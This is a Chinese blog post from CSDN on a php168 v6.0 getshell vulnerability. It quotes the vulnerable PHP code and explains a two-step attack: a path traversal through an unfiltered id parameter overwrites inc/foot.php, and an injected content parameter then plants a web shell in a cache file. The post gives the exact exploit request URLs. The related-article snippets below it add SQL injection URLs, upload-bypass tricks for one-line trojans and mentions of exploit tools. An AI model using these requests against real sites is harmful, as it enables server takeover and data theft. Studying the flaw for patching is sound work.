php168 shell,php168 v6.0拿shell漏洞

最新推荐文章于 2024-08-07 23:40:42 发布
最新推荐文章于 2024-08-07 23:40:42 发布
阅读量220 收藏
点赞数

PHP 文件操作 安全漏洞 代码注入 路径遍历
关键词由CSDN通过智能技术生成
该博客文章详细分析了两个PHP文件`jsarticle.php`和`bencandy.php`中存在的安全漏洞。通过不当的文件操作和条件判断,攻击者可以利用这些漏洞覆盖指定目录下的PHP文件内容,进而注入恶意代码。文章提到了利用方式,例如通过`do/jsarticle.php?type=like&id=xhming/../../../../inc/foot`和`do/bencandy.php?fid=4&id=582&content=cache/bencandy_cache/0/582_1.php`等请求进行攻击。建议加强文件操作的安全性,过滤输入参数,防止代码注入。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

两步 第一 do/下jsarticle.php文件

if(!eregi("^(hot|com|new|lastview|like|pic)$",$type)){

die("类型有误");

}

$FileName=dirname(__FILE__)."/../cache/jsarticle_cache/";

if($type==’like’){

$FileName.=floor($id/3000)."/";

}else{

unset($id);

}

$FileName.="{$type}_{$fid}_{$id}.php";

..................

if(!is_dir(dirname($FileName))){

makepath(dirname($FileName));

}

if( (time()-filemtime($FileName))>($webdb["cache_time_$type"]*60) ){

write_file($FileName,"");

//write_file上面覆盖任意php文件!因为id没过滤

}

第二 do/bencandy.php文件

require_once(dirname(__FILE__)."/"."global.php");

!$aid && $aid = intval($id);

$id = $aid;

$page<1 && $page=1;

$min=intval($page)-1;

$erp=$Fid_db[iftable][$fid]?$Fid_db[iftable][$fid]:’’;

$rsdb=$db->get_one("Select R.*,A.* FROM {$pre}article$erp A LEFT JOIN {$pre}reply$erp R ON A.aid=R.aid Where A.aid=$aid orDER BY R.topic DESC,R.orderid ASC LIMIT $min,1");

if(!$rsdb){

showerr("数据不存在!");

}elseif($fid!=$rsdb[fid]){

showerr("FID有误");

}

........................

$Cache_FileName=PHP168_PATH."cache/bencandy_cache/".floor($id/3000)."/{$id}_{$page}.php";

if(!$jobs&&$webdb[bencandy_cache_time]&&(time()-filemtime($Cache_FileName))echo read_file($Cache_FileName);

exit;

}

..................................

if(!$jobs&&$webdb[bencandy_cache_time]&&(time()-filemtime($Cache_FileName))>($webdb[bencandy_cache_time]*60)){

if(!is_dir(dirname($Cache_FileName))){

makepath(dirname($Cache_FileName));

}

$content.=" ";

write_file($Cache_FileName,$content); //注意这里写文件了

}elseif($jobs==’show’){

@unlink($Cache_FileName);

}

到这里大概问题也差不多搞清楚了,我们看下$content,其实它是作过初始化的,往上可以看到require(PHP168_PATH."inc/foot.php");这样一句,初始化就在这里,我们利用第一个问题,覆盖这文件里的内容,接下来我们就可以直接提交$content变量注入shell代码了!

利用:

do/jsarticle.php?type=like&id=xhming/../../../../inc/foot

do/bencandy.php?fid=4&id=582&content=

cache/bencandy_cache/0/582_1.php //记住id值,由于有缓存和时间的判断每一步要等会

利用WebShellShell技巧
悦分享
08-01 2235
webshell就是以asp、php、jsp等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php等后门文件与网站服务器WEB目录下正常的网页文件混在一起,可以使用浏览器来访问留下的后门,达到控制网站服务器的目的。shell的含义是取得对服务器某种程度上的操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。...
一句话木马拿Shell与菜刀原理
悦分享
07-12 1860
1. 直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg2. 有时上传图片格式的木马,居然被程序检测拦截了,右键记事本打开木马,在代码最前面加上gif89a,再数据库备份备份成asp格式的木马拿下shell。3. 上传图片格式木马,复制地址到数据库备份备份成asp格式木马,有时不成功的话,就利用IIs6.0解析漏洞,格式:1.asp;
php168sql注入漏洞
08-15
php168某版本存在sql注入,可通过该漏洞获取数据库信息
php168 shell,php168 v6/v7鸡肋Getshell安全问题
weixin_39949506的博客
03-09 212
刚搜了一下貌似和以前一个漏洞是一个问题。有点鸡肋,需要条件:1.网站配置为:文章生成真静态2.允许注册会员给出v6的测试代码,提交后执行phpinfo(),v7原理一样,只是数据库字段数不一样。member/list.php?step=2&type=delete&aiddb[]=-1)%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2,3,4,...
php168新版后台模板拿shell 技巧
fengling132的专栏
05-02 1926
摘要:php168新版后台模板拿shell技巧 ,PHP漏洞,安全周边,溜客安全信息网 ... 文章作者:Just4u 本人一向没什么技术文章,只是一个技巧,欢迎各位补充指点 刚刚看了黑影小子渗透cmd5的文章,说后台模板那块和谐了eval 我刚刚在官网下载了php168的系统本地搭建起来. 主要看了一下后台模板那里 我们新建一个页面试试
php168的一个漏洞
qq_15618849的专栏
03-10 1703
这个问题是程序员容易忽略的,往往只是依靠gpc或addslashes函数对用户直接输入的数据进行处理,这样数据中的'"等都会被\转义,这样就能正确的执行sql语句,有效防止注入攻击了。但存入数据库的数据呢?在执行完sql语句存入数据库的是经过gpc处理前的原始数据,那么当程序再select出的就是受污染的数据了,如果把select出的数据再执行sql语句,那么就触发了sqlinj,如果直接写入缓存
php168系统漏洞,php168某系统注入漏洞
weixin_28885435的博客
03-29 388
漏洞概要缺陷编号:WooYun-2012-013476漏洞标题:php168某系统注入漏洞相关厂商:PHP168漏洞作者:书生提交时间:2012-10-17 22:33公开时间:2012-10-17 22:33漏洞类型:SQL注射漏洞危害等级:高自评Rank:20漏洞状态:未联系到厂商或者厂商积极忽略Tags标签:漏洞详情披露状态:2012-10-17: 积极联系厂商并且等待厂商认领中,细节不对外...
骑士CMS模版注入+文件包含getshell漏洞复现
玄道的网安博客
12-22 3296
简介 骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统 漏洞概述 公告地址: http://www.74cms.com/news/show-2497.html /Application/Common/Controller/BaseController.class.php文件的assign_resume_tpl函数因为过滤不严格,导致了模板注入,可以进行远程命令执行。 影响版本 骑士 CMS < 6.0.48 环境搭建 ...
常见框架漏洞 中(IIS6.x、IIS7.x、Apache、Nginx)
最新发布
2301_76631050的博客
08-07 1349
目录中间件IISIIS6.x篇PUT漏洞漏洞描述环境漏洞复现漏洞复现工具连接IIS6.0解析漏洞IIS短文件漏洞漏洞描述原理复现短⽂件名特征:⼯具IIS RCE-CVE-2017-7269简介影响范围复现利⽤⼯具反弹shellApache未知扩展名解析漏洞AddHandler导致的解析漏洞目录遍历漏洞原理复现Apache HTTPD 换行解析漏洞(CVE-2017-15715)Nginx文件解析漏洞目录遍历漏洞描述原理漏洞复现CRLF注⼊漏洞复现文件名逻辑漏洞(CVE-2013-4547)描述环境漏洞复现中
[网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
热门推荐
杨秀璋的专栏
05-12 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入和shell反弹、权限提升和获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
PHP168 0Day 文件代码泄露漏洞利用工具
03-24
PHP168 0Day 文件代码泄露漏洞利用工具
php168下载任意文件漏洞利用工具
05-22
php168下载任意文件 内部用的。。现在共享上来 拿积分的,点击查看代码后 等上三秒钟 如果有漏洞就可以看到对方的源代码了。。。
php168v4.0漏洞,Php168 v 4.0 sp global.php 写入漏洞
weixin_31361715的博客
03-10 152
在global.php中有这样的代码:function login_logs($username,$password){global $timestamp,$onlineip;$logdb[]=\"$username\\t$password\\t$timestamp\\t$onlineip\";@include(PHP168_PATH.\"cache/adminlogin_logs.php\");...
PHP168 6.0及以下版本漏洞
weixin_30275415的博客
09-18 166
最近在研究PHP那个劲啊,就甭提鸟———————————本文引自黑客动画吧 危险等级:高 影响版本:PHP168 6.0以下版本 入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。 出问题的文件login.php login.php?makehtml=1&chdb[htmlname]=...
Php168代码执行漏洞,Vulnhub-ThinkPHP 2.x 任意代码执行漏洞
weixin_39637711的博客
03-27 230
郑重声明:所用漏洞环境为自建虚拟机vulnhub靶机环境,仅供本人学习使用。漏洞简述ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));导致用户的输入参数被插入双...
php 168,PHP168一个神奇的漏洞,可查询任意用户数据
weixin_39914107的博客
03-10 1289
国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile以PHP168官方演示站点为例,查看任意用户信息的页面...
php168v4.0漏洞,PHP168 V4.0 cookie欺骗 EXP
weixin_35958479的博客
03-10 337
漏洞的原理:具体的请看admin/global.php这个文件里面关于用户登陆部分的代码,这里截取一下。。。/*用户登录*/if($_POST[loginname]&&$_POST[loginpwd]){if($webdb[yzImgAdminLogin]){if(!get_cookie("yzImgNum")||get_cookie("yzImgNum")!=$yzi...
php168 6.02漏洞,PHP168 V6.02整站系统远程执行任意代码漏洞
weixin_30695935的博客
03-11 919
PHP168在某些函数里运用了eval函数,但是某数组没有初试化,导致可以提交任意代码执行.漏洞出在inc/function.inc.php里面.get_html_url()这个函数.function get_html_url(){global $rsdb,$aid,$fidDB,$webdb,$fid,$page,$showHtml_Type,$Html_Type;$id=$aid;if($pa...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值